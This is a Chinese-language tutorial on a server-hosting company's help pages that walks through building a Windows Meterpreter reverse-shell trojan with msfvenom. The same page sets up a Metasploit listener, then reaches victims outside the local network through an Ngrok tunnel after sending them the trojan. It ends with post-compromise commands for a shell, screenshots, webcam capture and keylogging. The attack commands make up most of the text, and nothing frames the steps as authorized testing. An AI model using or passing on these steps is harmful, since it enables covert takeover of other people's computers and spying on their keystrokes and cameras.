帮助文档
专业提供香港服务器、香港云服务器、香港高防服务器租用、香港云主机、台湾服务器、美国服务器、美国云服务器vps租用、韩国高防服务器租用、新加坡服务器、日本服务器租用 一站式全球网络解决方案提供商!专业运营维护IDC数据中心,提供高质量的服务器托管,服务器机房租用,服务器机柜租用,IDC机房机柜租用等服务,稳定、安全、高性能的云端计算服务,实时满足您的多样性业务需求。 香港大带宽稳定可靠,高级工程师提供基于服务器硬件、操作系统、网络、应用环境、安全的免费技术支持。
服务器资讯 / 香港服务器租用 / 香港VPS租用 / 香港云服务器 / 美国服务器租用 / 台湾服务器租用 / 日本服务器租用 / 官方公告 / 帮助文档
kali渗透内网和外网
发布时间:2024-02-29 17:42:43   分类:帮助文档
kali渗透内网和外网

生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵)
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:
-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”
lhost:设置kali的IP
lport:设置端口(要与下面的setlport保持一致)
-f:文件的类型为exe类型
-o:生成payload,名为payload.exe,保存在kali的/root目录下

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f exe -o /root/tjy.exe

第二步:将生成的木马文件发送到对方电脑
我们启动kali
msfconsole 进入msfconsole

use exploit/multi/handler 使用这个漏洞辅助



设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)
set payload windows/meterpreter/reverse_tcp

设置一个lhost和lport,要与文章最开始的msfvenom命令中的IP和端口保持一致



exploit 或 run



接下来我们只要等对方电脑运行刚刚那个木马


生成木马文件,从而控制对方电脑(内网可以入侵外网)
在开始生成木马之前,我们要先做好准备工作
在kali里面要下载Sunny-Ngrok的Linux64版本,下载好后解压
接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用


这里将下载好的linux64压缩包进行解压

命令解压缩:unzip linux_amd64(压缩包名)



进入解压好的目录
cd linux_amd64

启动隧道映射TCP服务
./sunny clientid (隧道id) 这里的隧道id看下图


启动后是这样的


接下来就是生成外网的木马程序了
注意:这里lhost和lport分别为赠送的域名和端口
msfvenom -p windows/meterpreter/reverse_tcplhost=xxx.xxx.com lport=10306 -f exe -o /root/shell.exe



接下来就是在msf中设置payload,加载攻击模块设置本地IP何监听端口了
msfconsole 打开msf

use exploit/multi/handler 使用这个漏洞辅助
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)
set LHOST 192.168.245.140 这里设置成kali的IP
set LPORT 4444 这里是你要侦听的端口
这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网

show options 查看IP端口设置情况

exploit 或 run 开启侦听

接下来我们只要等对方电脑运行刚刚那个木马
成功后时以下这图

入侵成功后所能做的(这只是可以做的一部分)
getuid 获取靶机uidmeterpreter

shell 进入靶机shellmeterpreter

screenshot 靶机截屏meterpreter

webcam_snap 用靶机摄像头拍照meterpreter

webcam_stream 用靶机摄像头录像meterpreter

keyscan_start 开启键盘记录meterpreter

keyscan_dump 捕获键盘记录

keyscan_stop 停止键盘记录




香港云服务器租用推荐
服务器租用资讯
·广东云服务有限公司怎么样
·广东云服务器怎么样
·广东锐讯网络有限公司怎么样
·广东佛山的蜗牛怎么那么大
·广东单位电话主机号怎么填写
·管家婆 花生壳怎么用
·官网域名过期要怎么办
·官网邮箱一般怎么命名
·官网网站被篡改怎么办
服务器租用推荐
·美国服务器租用
·台湾服务器租用
·香港云服务器租用
·香港裸金属服务器
·香港高防服务器租用
·香港服务器租用特价